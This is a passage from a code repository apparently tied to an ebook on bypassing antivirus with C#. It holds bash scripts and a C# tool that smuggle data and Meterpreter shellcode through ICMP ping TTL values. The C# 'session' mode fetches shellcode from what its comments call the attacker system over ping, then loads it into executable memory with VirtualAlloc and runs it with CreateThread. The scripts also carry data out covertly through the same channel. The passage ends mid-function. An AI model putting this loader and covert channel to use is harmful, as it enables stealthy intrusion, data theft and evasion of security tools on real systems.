payload+="e" 308 | fi 309 | ;; 310 | 115) 311 | tput setaf 2; 312 | echo "[$Time]" "Dumped Byte via TTL : f" 313 | if (( $temp != 115 )) ; 314 | then 315 | payload+="f" 316 | fi 317 | ;; 318 | 255) 319 | tput setaf 1; 320 | echo "[$Time] ," $c ":Dumped Finish Flag 'ttl 255' " 321 | 322 | ((c++)); 323 | 324 | if (( $c == 15 )) ; 325 | then 326 | break 327 | fi 328 | ;; 329 | 253) 330 | tput setaf 3; 331 | echo "[$Time] ," $c ":Dumped Double Flag 'ttl 253' " 332 | ;; 333 | esac 334 | 335 | temp=$string; 336 | 337 | tput setaf 9; 338 | echo "Ping Requests:" $PingRequest 339 | echo "your Payload :" $payload 340 | tput setaf 9; 341 | 342 | #final=`echo $payload | xxd -r -p` 343 | 344 | final=`echo -n $payload | od -A n -t x1 | xxd -r -p | xxd -r -p` 345 | echo "your Data : " $final 346 | 347 | sleep 1; 348 | done 349 | fi 350 | 351 | -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/README.md: -------------------------------------------------------------------------------- 1 | # Course : Bypassing Anti Viruses by C#.NET Programming 2 | 3 | Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 10 : Transferring Payload via ICMPv4 Traffic by TTL 4 | 5 | eBook : Bypassing Anti Viruses by C#.NET Programming 6 | 7 | eBook chapter 10 , PDF Download : https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/tree/master/CH10 8 | 9 | # NativePayload_ICMP.sh help : 10 | 11 | # Using this Method via two Linux systems (Linux only) 12 | 13 | step1 (Linux system A with IPv4 192.168.1.10) : ./NativePayload_ICMP.sh shtext ”your text” 14 | 15 | step2 (Linux system B with IPv4 192.168.1.13) : ./NativePayload_ICMP.sh listen 192.168.1.10 16 | 17 | # Using this Method via one Linux system and one Windows system . 18 | 19 | step1 (Linux system A with IPv4 192.168.1.10) : ./NativePayload_ICMP.sh shtext ”your text” 20 | 21 | step2 (windows system B with IPv4 192.168.1.13) : ./NativePayload_ICMP.exe listen 192.168.1.10 22 | 23 | Description: with Step1 (system A) you will inject bytes for "text" to TTL Values , with Step2 on (system B) you can have this text via Send/Rec ICMPv4 Traffic (Ping Response) 24 | 25 | 26 | Using this Method via two Linux systems (Linux only) 27 | ![](https://github.com/DamonMohammadbagher/NativePayload_ICMP/blob/master/Chapter%2010%20-%20Transferring%20Payload%20via%20ICMPv4%20Traffic%20by%20TTL/NativePayload_ICMP.png) 28 | 29 | Using this Method via one Linux system and one Windows system . 30 | ![](https://github.com/DamonMohammadbagher/NativePayload_ICMP/blob/master/Chapter%2010%20-%20Transferring%20Payload%20via%20ICMPv4%20Traffic%20by%20TTL/NativePayload_ICMP(WindowsLinux).png) 31 | 32 | -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/NativePayload_ICMP(old version).sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | payload=""; 3 | PingRequest=0; 4 | c=0; 5 | temp=""; 6 | while (true) 7 | do 8 | Time=`date '+%d/%m/%Y %H:%M:%S'` 9 | ((PingRequest++)); 10 | 11 | string=`ping $1 -c 1 | grep -e ttl= | awk {'print $6'}` 12 | echo 13 | string=`echo $string | cut -d'=' -f2` 14 | 15 | case $string in 16 | 100) 17 | tput setaf 2; 18 | echo "[$Time]" "Dumped Byte via TTL : 0" 19 | if (( $temp != 100 )) ; 20 | then 21 | payload+="0" 22 | fi 23 | ;; 24 | 101) 25 | tput setaf 2; 26 | echo "[$Time]" "Dumped Byte via TTL : 1" 27 | if (( $temp != 101 )) ; 28 | then 29 | payload+="1" 30 | fi 31 | ;; 32 | 102) 33 | tput setaf 2; 34 | echo "[$Time]" "Dumped Byte via TTL : 2" 35 | if (( $temp != 102 )) ; 36 | then 37 | payload+="2" 38 | fi 39 | ;; 40 | 103) 41 | tput setaf 2; 42 | echo "[$Time]" "Dumped Byte via TTL : 3" 43 | if (( $temp != 103 )) ; 44 | then 45 | payload+="3" 46 | fi 47 | ;; 48 | 104) 49 | tput setaf 2; 50 | echo "[$Time]" "Dumped Byte via TTL : 4" 51 | if (( $temp != 104 )) ; 52 | then 53 | payload+="4" 54 | fi 55 | ;; 56 | 105) 57 | tput setaf 2; 58 | echo "[$Time]" "Dumped Byte via TTL : 5" 59 | if (( $temp != 105 )) ; 60 | then 61 | payload+="5" 62 | fi 63 | ;; 64 | 106) 65 | tput setaf 2; 66 | echo "[$Time]" "Dumped Byte via TTL : 6" 67 | if (( $temp != 106 )) ; 68 | then 69 | payload+="6" 70 | fi 71 | ;; 72 | 107) 73 | tput setaf 2; 74 | echo "[$Time]" "Dumped Byte via TTL : 7" 75 | if (( $temp != 107 )) ; 76 | then 77 | payload+="7" 78 | fi 79 | ;; 80 | 108) 81 | tput setaf 2; 82 | echo "[$Time]" "Dumped Byte via TTL : 8" 83 | if (( $temp != 108 )) ; 84 | then 85 | payload+="8" 86 | fi 87 | ;; 88 | 109) 89 | tput setaf 2; 90 | echo "[$Time]" "Dumped Byte via TTL : 9" 91 | if (( $temp != 109 )) ; 92 | then 93 | payload+="9" 94 | fi 95 | ;; 96 | 110) 97 | tput setaf 2; 98 | echo "[$Time]" "Dumped Byte via TTL : a" 99 | if (( $temp != 110 )) ; 100 | then 101 | payload+="a" 102 | fi 103 | ;; 104 | 111) 105 | tput setaf 2; 106 | echo "[$Time]" "Dumped Byte via TTL : b" 107 | if (( $temp != 111 )) ; 108 | then 109 | payload+="b" 110 | fi 111 | ;; 112 | 112) 113 | tput setaf 2; 114 | echo "[$Time]" "Dumped Byte via TTL : c" 115 | if (( $temp != 112 )) ; 116 | then 117 | payload+="c" 118 | fi 119 | ;; 120 | 113) 121 | tput setaf 2; 122 | echo "[$Time]" "Dumped Byte via TTL : d" 123 | if (( $temp != 113 )) ; 124 | then 125 | payload+="d" 126 | fi 127 | ;; 128 | 114) 129 | tput setaf 2; 130 | echo "[$Time]" "Dumped Byte via TTL : e" 131 | if (( $temp != 114 )) ; 132 | then 133 | payload+="e" 134 | fi 135 | ;; 136 | 115) 137 | tput setaf 2; 138 | echo "[$Time]" "Dumped Byte via TTL : f" 139 | if (( $temp != 115 )) ; 140 | then 141 | payload+="f" 142 | fi 143 | ;; 144 | 255) 145 | tput setaf 1; 146 | echo "[$Time] ," $c ":Dumped Finish Flag 'ttl 255' " 147 | 148 | ((c++)); 149 | 150 | if (( $c == 25 )) ; 151 | then 152 | break 153 | fi 154 | ;; 155 | esac 156 | 157 | temp=$string; 158 | 159 | tput setaf 9; 160 | echo "Ping Requests:" $PingRequest 161 | echo "your Payload :" $payload 162 | tput setaf 9; 163 | final=`echo $payload | xxd -r -p` 164 | echo "your Data : " $final 165 | sleep 1; 166 | done 167 | 168 | -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/finish.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/finish.png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 0.png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 1.png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 2.png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 3.png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/script(for test).sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | sudo sysctl net.ipv4.ip_default_ttl=254; 4 | sleep 5; 5 | TtlPayload="106109107104102107255107103102100106101106112106112102100106109106114107103106109106104106105102100106115106255106102100107109106115107105102114102100106109107104102107255107103102100106101106112106112102100106109106114107103106109106104106105102100106115106255106102100106113106105102100102114102114102114102100107109106115107105102100107255107106109106112106112102100107103106105106105"; 6 | for pay in `echo $TtlPayload | xxd -p -c 3` 7 | do 8 | str=`echo $pay | xxd -r -p` 9 | if [ "$str" != $'' ]; 10 | then 11 | echo "sudo sysctl net.ipv4.ip_default_ttl="$str "; sleep 2;" 12 | sudo sysctl net.ipv4.ip_default_ttl=$str; sleep 2; 13 | fi 14 | done 15 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 16 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 17 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 18 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 19 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 20 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 21 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 22 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 23 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 24 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 25 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 26 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 27 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 28 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 29 | sudo sysctl net.ipv4.ip_default_ttl=255; 30 | echo "Done."; 31 | 32 | -------------------------------------------------------------------------------- /EBOOK/NativePayload_ICMP(WindowsLinux).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/NativePayload_ICMP(WindowsLinux).png -------------------------------------------------------------------------------- /EBOOK/NativePayload_ICMP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Diagnostics; 6 | using System.Data; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace NativePayload_ICMP 10 | { 11 | class Program 12 | { 13 | static string payload = ""; 14 | public static DataTable Hex_Dec_Table; 15 | static string help = "\n" + "NativePayload_ICMP syntax :" + "\n\n" 16 | + "Syntax 1-1 : NativePayload_ICMP sh \"ffccab1cd01f0400 ....\" Input your meterpreter payload for create sh file" + "\n" 17 | + "Syntax 1-2 : NativePayload_ICMP session \"www.xxx.yyy.zzz\" Target system IPv4 Address for Send Ping Request .... Getting Meterpreter Session with Ping via TTL Values" + "\n" 18 | + "Syntax 2-1 : NativePayload_ICMP shtext \"your unicode text....\" Input your DATA/TEXT payload for create sh Script file" + "\n" 19 | + "Syntax 2-2 : NativePayload_ICMP listen \"www.xxx.yyy.zzz\" Target system IPv4 Address for Send Ping Request .... Dumping DATA/TEXT payload via TTL Values" + "\n" 20 | + "Syntax 3 : NativePayload_ICMP help" + "\n\n"; 21 | 22 | static void Main(string[] args) 23 | { 24 | try 25 | { 26 | Hex_Dec_Table = new DataTable(); 27 | 28 | Hex_Dec_Table.Columns.Add("Dec", typeof(int)); 29 | Hex_Dec_Table.Columns.Add("Hex", typeof(string)); 30 | 31 | for (int i = 0; i <= 15; i++) 32 | { 33 | if (i <= 9) 34 | { 35 | Hex_Dec_Table.Rows.Add(i, i.ToString()); 36 | } 37 | else if (i >= 10) 38 | { 39 | switch (i) 40 | { 41 | case 10: 42 | { 43 | Hex_Dec_Table.Rows.Add(i, "a"); 44 | } 45 | break; 46 | case 11: 47 | { 48 | Hex_Dec_Table.Rows.Add(i, "b"); 49 | } 50 | break; 51 | case 12: 52 | { 53 | Hex_Dec_Table.Rows.Add(i, "c"); 54 | } 55 | break; 56 | case 13: 57 | { 58 | Hex_Dec_Table.Rows.Add(i, "d"); 59 | } 60 | break; 61 | case 14: 62 | { 63 | Hex_Dec_Table.Rows.Add(i, "e"); 64 | } 65 | break; 66 | case 15: 67 | { 68 | Hex_Dec_Table.Rows.Add(i, "f"); 69 | } 70 | break; 71 | // default: 72 | } 73 | } 74 | } 75 | if (args[0].ToUpper() == "HELP") 76 | { 77 | Console.WriteLine(); 78 | Console.ForegroundColor = ConsoleColor.DarkGray; 79 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 80 | Console.ForegroundColor = ConsoleColor.Gray; 81 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 82 | Console.WriteLine(); 83 | Console.WriteLine(help); 84 | } 85 | else if (args[0].ToUpper() == "SH" || args[0].ToUpper() == "SHTEXT") 86 | { 87 | Console.WriteLine(); 88 | Console.ForegroundColor = ConsoleColor.DarkGray; 89 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 90 | Console.ForegroundColor = ConsoleColor.Gray; 91 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 92 | Console.WriteLine(); 93 | if (args.Length == 2) 94 | { 95 | if (args[0].ToUpper() == "SH") 96 | { 97 | payload = args[1]; 98 | } 99 | if(args[0].ToUpper() == "SHTEXT") 100 | { 101 | try 102 | { 103 | byte[] Xbytes = ASCIIEncoding.ASCII.GetBytes(args[1]); 104 | foreach (var item in Xbytes) 105 | { 106 | payload += item.ToString("x2"); 107 | } 108 | } 109 | catch (Exception e) 110 | { 111 | Console.Write(e.Message); 112 | } 113 | } 114 | } 115 | string ff = ""; 116 | string lastone = ""; 117 | string TempPayload = ""; 118 | for (int i = 0; i < payload.Length;) 119 | { 120 | if (i != payload.Length) 121 | { 122 | ff = payload.Substring(i, 1); 123 | string ss = _HextoDecimal(ff); 124 | // debug only 125 | //Console.WriteLine(ff + " " + ss); 126 | ///Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 1 ;"); 127 | if (lastone != ss) 128 | { 129 | lastone = ss; 130 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n"); 131 | TempPayload += ss.Substring(0, ss.Length - 1); 132 | } 133 | else 134 | { 135 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n"); 136 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n"); 137 | TempPayload += "255" + ss.Substring(0, ss.Length - 1); 138 | } 139 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n"); 140 | //Console.WriteLine(); 141 | i++; 142 | } 143 | } 144 | 145 | StringBuilder Mycode = new StringBuilder(); 146 | Mycode.AppendLine(" #!/bin/sh \n"); 147 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=254;\r"); 148 | Mycode.AppendLine("sleep 5;"); 149 | Mycode.AppendLine("TtlPayload=\"" + TempPayload + "\";"); 150 | Mycode.AppendLine(" for pay in `echo $TtlPayload | xxd -p -c 3`"); 151 | Mycode.AppendLine(" do "); 152 | Mycode.AppendLine(" str=`echo $pay | xxd -r -p`"); 153 | Mycode.AppendLine(" if [ \"$str\" != $'' ];"); 154 | Mycode.AppendLine(" then "); 155 | Mycode.AppendLine(" echo \"sudo sysctl net.ipv4.ip_default_ttl=\"$str \"; sleep 2;\""); 156 | Mycode.AppendLine(" sudo sysctl net.ipv4.ip_default_ttl=$str; sleep 2;"); 157 | Mycode.AppendLine(" fi"); 158 | Mycode.AppendLine(" done"); 159 | if (args[0].ToUpper() == "SHTEXT") 160 | { 161 | for (int i = 0; i < 5 - args[1].Length % 5; i++) 162 | { 163 | if (args[1].Length % 5 == 0) break; 164 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 165 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 166 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 167 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 168 | } 169 | 170 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 171 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 172 | } 173 | 174 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255;"); 175 | Mycode.AppendLine("echo \"Done.\";"); 176 | 177 | Console.WriteLine("\n[!] File script.sh Created : \n"); 178 | Console.WriteLine(Mycode.ToString()); 179 | try 180 | { 181 | using (System.IO.FileStream Fs = new System.IO.FileStream("script.sh", System.IO.FileMode.Create, System.IO.FileAccess.Write, System.IO.FileShare.None)) 182 | { 183 | using (System.IO.StreamWriter sw = new System.IO.StreamWriter(Fs)) 184 | { 185 | sw.WriteLine(Mycode.ToString().Replace("\r", string.Empty)); 186 | } 187 | } 188 | } 189 | catch (Exception omg) 190 | { 191 | Console.WriteLine(omg.Message); 192 | } 193 | } 194 | else if (args[0].ToUpper() == "LISTEN") 195 | { 196 | bool flag_end = false; 197 | bool init = false; 198 | int flag_end_count = 0; 199 | int Payload_counter = 0; 200 | string temp = ""; 201 | string start_time, end_time = ""; 202 | start_time = DateTime.Now.ToString(); 203 | string Oonaggi = ""; 204 | Console.WriteLine(); 205 | Console.ForegroundColor = ConsoleColor.DarkGray; 206 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 207 | Console.ForegroundColor = ConsoleColor.Gray; 208 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 209 | Console.WriteLine(); 210 | Console.ForegroundColor = ConsoleColor.Yellow; 211 | Console.WriteLine("[!] Listening Mode"); 212 | Console.ForegroundColor = ConsoleColor.Gray; 213 | Console.WriteLine(); 214 | bool isDublicate = false; 215 | string Last_ttl_str = ""; 216 | string TestStr = ""; 217 | int Timer_Time_Show_Bytes = 0; 218 | int two = 0; 219 | string String_two_Bytes = ""; 220 | byte[] String_from_Bytes = new byte[5]; 221 | Console.WriteLine("{0} Dumping These Bytes: ", DateTime.Now.ToString()); 222 | String_two_Bytes = ""; 223 | while (true) 224 | { 225 | if (flag_end) break; 226 | //// ping and send ICMP Traffic to attacker linux system to Dump payloads via TTL response ;) 227 | string getcode = _Ping(args[1], 1); 228 | try 229 | { 230 | getcode = getcode.Remove(getcode.Length - 1, 1); 231 | } 232 | catch (Exception e1) 233 | { 234 | Console.ForegroundColor = ConsoleColor.Red; 235 | Console.WriteLine("e1 : " + e1.Message); 236 | Console.WriteLine(); 237 | Console.WriteLine("Error : it is not good ;( "); 238 | Console.WriteLine("Please run this tool again"); 239 | Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)"); 240 | Console.ForegroundColor = ConsoleColor.Gray; 241 | break; 242 | } 243 | 244 | if (getcode == "254") { init = true; } 245 | if (getcode == "255") 246 | { 247 | isDublicate = true; 248 | Last_ttl_str = getcode; 249 | } 250 | if (getcode != "255") 251 | { 252 | Last_ttl_str = getcode; 253 | flag_end_count = 0; 254 | 255 | if (getcode != temp && getcode != "255" && getcode != "253") 256 | { 257 | if (init && getcode != "254") 258 | { 259 | if (Timer_Time_Show_Bytes == 10) 260 | { 261 | Console.ForegroundColor = ConsoleColor.DarkCyan; 262 | int kk = 0; 263 | for (int i = 0; i < 5;) 264 | { 265 | String_from_Bytes[i] = byte.Parse(String_two_Bytes.Substring(kk, 2), System.Globalization.NumberStyles.HexNumber); 266 | kk++; 267 | kk++; 268 | i++; 269 | } 270 | 271 | Console.Write(" ==> " + ASCIIEncoding.ASCII.GetString(String_from_Bytes)); 272 | Timer_Time_Show_Bytes = 0; 273 | String_two_Bytes = ""; 274 | Console.WriteLine(); 275 | } 276 | 277 | Console.ForegroundColor = ConsoleColor.Cyan; 278 | TestStr = getcode.Substring(getcode.Length - 2, 2); 279 | string Text = ""; 280 | for (int j = 0; j <= 15; j++) 281 | { 282 | if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(TestStr)) 283 | { 284 | 285 | Text = (Hex_Dec_Table.Rows[j].ItemArray[1].ToString()); 286 | break; 287 | } 288 | } 289 | 290 | Console.Write("{0}", Text); 291 | String_two_Bytes += Text; 292 | 293 | Payload_counter++; 294 | Timer_Time_Show_Bytes++; 295 | two++; 296 | } 297 | else if (init == false) 298 | { 299 | // Console.ForegroundColor = ConsoleColor.DarkGreen; 300 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 301 | } 302 | } 303 | else if (getcode == temp && getcode != "255") 304 | { 305 | // Console.ForegroundColor = ConsoleColor.DarkGreen; 306 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 307 | } 308 | 309 | System.Threading.Thread.Sleep(1000); 310 | temp = getcode; 311 | } 312 | else if (getcode == "255") 313 | { 314 | flag_end_count++; 315 | Console.ForegroundColor = ConsoleColor.Gray; 316 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 317 | 318 | System.Threading.Thread.Sleep(500); 319 | temp = getcode; 320 | if (flag_end_count >= 10) 321 | { 322 | flag_end = true; 323 | Console.ForegroundColor = ConsoleColor.Gray; 324 | Console.WriteLine(); 325 | Console.WriteLine("{0} Dumping Payloads Done.",DateTime.Now.ToString()); 326 | } 327 | } 328 | } 329 | } 330 | else if (args[0].ToUpper() == "SESSION") 331 | { 332 | bool flag_end = false; 333 | bool init = false; 334 | int flag_end_count = 0; 335 | int Payload_counter = 0; 336 | string temp = ""; 337 | string start_time, end_time = ""; 338 | start_time = DateTime.Now.ToString(); 339 | string Oonaggi = ""; 340 | Console.WriteLine(); 341 | Console.ForegroundColor = ConsoleColor.DarkGray; 342 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 343 | Console.ForegroundColor = ConsoleColor.Gray; 344 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 345 | Console.WriteLine(); 346 | Console.ForegroundColor = ConsoleColor.Yellow; 347 | Console.WriteLine("[!] Meterpreter Session Mode"); 348 | Console.ForegroundColor = ConsoleColor.Gray; 349 | Console.WriteLine(); 350 | bool isDublicate = false; 351 | string Last_ttl_str = ""; 352 | while (true) 353 | { 354 | if (flag_end) break; 355 | //// ping and sending ICMP Traffic to attacker linux system to Dump payloads by TTL response ;) 356 | string getcode = _Ping(args[1], 1); 357 | try 358 | { 359 | getcode = getcode.Remove(getcode.Length - 1, 1); 360 | } 361 | catch (Exception e1) 362 | { 363 | Console.ForegroundColor = ConsoleColor.Red; 364 | Console.WriteLine("e1 : " + e1.Message); 365 | Console.WriteLine(); 366 | Console.WriteLine("Error : it is not good ;( "); 367 | Console.WriteLine("Please run this tool again"); 368 | Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)"); 369 | Console.ForegroundColor = ConsoleColor.Gray; 370 | break; 371 | } 372 | 373 | if (getcode == "254") { init = true; } 374 | if (getcode == "255") 375 | { 376 | isDublicate = true; 377 | Last_ttl_str = getcode; 378 | } 379 | if (getcode != "255") 380 | { 381 | Last_ttl_str = getcode; 382 | flag_end_count = 0; 383 | if (getcode != temp && getcode != "255" && getcode != "253") 384 | { 385 | if (init && getcode != "254") 386 | { 387 | Console.ForegroundColor = ConsoleColor.Green; 388 | Console.Write("{0} , Dump:{1},", DateTime.Now.ToString(), Payload_counter.ToString()); 389 | Console.ForegroundColor = ConsoleColor.Cyan; 390 | //string dd = _HextoDecimal(getcode.Substring(1, 2)); 391 | Console.Write(" DATA[{0}] ", getcode.Substring(getcode.Length - 2, 2)); 392 | Oonaggi += getcode.Substring(getcode.Length - 2, 2); 393 | Console.ForegroundColor = ConsoleColor.Green; 394 | Console.WriteLine("from {0} final: {1}", args[1], getcode); 395 | Payload_counter++; 396 | } 397 | else if (init == false) 398 | { 399 | Console.ForegroundColor = ConsoleColor.DarkGreen; 400 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 401 | } 402 | } 403 | else if (getcode == temp && getcode != "255") 404 | { 405 | Console.ForegroundColor = ConsoleColor.DarkGreen; 406 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 407 | } 408 | 409 | System.Threading.Thread.Sleep(1000); 410 | temp = getcode; 411 | } 412 | else if (getcode == "255") 413 | { 414 | flag_end_count++; 415 | Console.ForegroundColor = ConsoleColor.DarkGreen; 416 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 417 | 418 | System.Threading.Thread.Sleep(500); 419 | temp = getcode; 420 | if (flag_end_count >= 10) { flag_end = true; } 421 | } 422 | } 423 | 424 | end_time = DateTime.Now.ToString(); 425 | 426 | Console.WriteLine(end_time + " , Done "); 427 | 428 | byte[] __Bytes = new byte[Oonaggi.Length / 4]; 429 | int payload_dec_count = Oonaggi.Length / 4; 430 | int tmp_counter = 0; 431 | string current = null; 432 | int _0_to_2_ = 0; 433 | for (int d = 0; d < payload_dec_count;) 434 | { 435 | string tmp1_current = (Oonaggi.Substring(tmp_counter, 2)); 436 | 437 | for (int j = 0; j <= 15; j++) 438 | { 439 | if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(tmp1_current)) 440 | { 441 | _0_to_2_++; 442 | 443 | current += (Hex_Dec_Table.Rows[j].ItemArray[1].ToString()); 444 | 445 | if (_0_to_2_ == 2) 446 | { 447 | Console.Write(current + " "); 448 | __Bytes[d] = Convert.ToByte(current, 16); 449 | _0_to_2_ = 0; 450 | d++; 451 | current = null; 452 | } 453 | } 454 | } 455 | 456 | tmp_counter++; 457 | tmp_counter++; 458 | 459 | } 460 | Console.WriteLine(); 461 | Console.ForegroundColor = ConsoleColor.Gray; 462 | Console.WriteLine("Bingo Meterpreter session by ICMPv4 traffic ;)"); 463 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 464 | Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length); 465 | IntPtr hThread = IntPtr.Zero; 466 | UInt32 threadId = 0; 467 | IntPtr pinfo = IntPtr.Zero; 468 | 469 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 470 | WaitForSingleObject(hThread, 0xFFFFFFFF); 471 | 472 | } 473 | } 474 | catch (Exception _main) 475 | { 476 | Console.WriteLine("Main Error: {0}", _main.Message); 477 | Console.WriteLine("Main Error: Please use help , NativePayload_ICMP help", _main.Message); 478 | } 479 | } 480 | 481 | 482 | static Dictionary HexDic = new Dictionary 483 | { 484 | //// {'0',200},{'1',201},{'2',202},{'3',203},{'4',204},{'5',205},{'6',206},{'7',207},{'8',208} 485 | //// ,{'9',209},{'a',210},{'b',211},{'c',212},{'d',213},{'e',214},{'f',215} 486 | 487 | {'0',100},{'1',101},{'2',102},{'3',103},{'4',104},{'5',105},{'6',106},{'7',107},{'8',108} 488 | ,{'9',109},{'a',110},{'b',111},{'c',112},{'d',113},{'e',114},{'f',115} 489 | }; 490 | 491 | static string _HextoDecimal(string hexstring) 492 | { 493 | 494 | string result = ""; 495 | hexstring = hexstring.ToLower(); 496 | for (int i = 0; i < hexstring.Length; i++) 497 | { 498 | char Oonagii = hexstring[hexstring.Length - 1 - i]; 499 | result += (HexDic[Oonagii] * (int)Math.Pow(16, i)).ToString() + " "; 500 | } 501 | return result; 502 | } 503 | 504 | 505 | static string _Ping(string IPAddress_DNSName, int counter) 506 | { 507 | string Final_Dec = ""; 508 | 509 | try 510 | { 511 | 512 | if (counter != 1) { counter = 1; } 513 | 514 | /// Make DNS traffic for getting Meterpreter Payloads by nslookup 515 | ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("ping.exe", IPAddress_DNSName + " -n " + counter.ToString()); 516 | ns_Prcs_info.RedirectStandardInput = true; 517 | ns_Prcs_info.RedirectStandardOutput = true; 518 | ns_Prcs_info.UseShellExecute = false; 519 | 520 | 521 | Process nslookup = new Process(); 522 | nslookup.StartInfo = ns_Prcs_info; 523 | nslookup.StartInfo.WindowStyle = 